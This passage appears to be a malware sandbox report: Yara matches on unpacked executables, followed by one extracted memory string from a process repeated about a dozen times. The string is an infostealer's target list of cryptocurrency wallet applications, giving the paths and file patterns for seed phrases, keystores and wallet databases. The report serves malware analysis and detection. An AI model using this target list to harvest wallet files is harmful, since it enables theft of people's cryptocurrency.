                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack, type: UNPACKEDPE
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
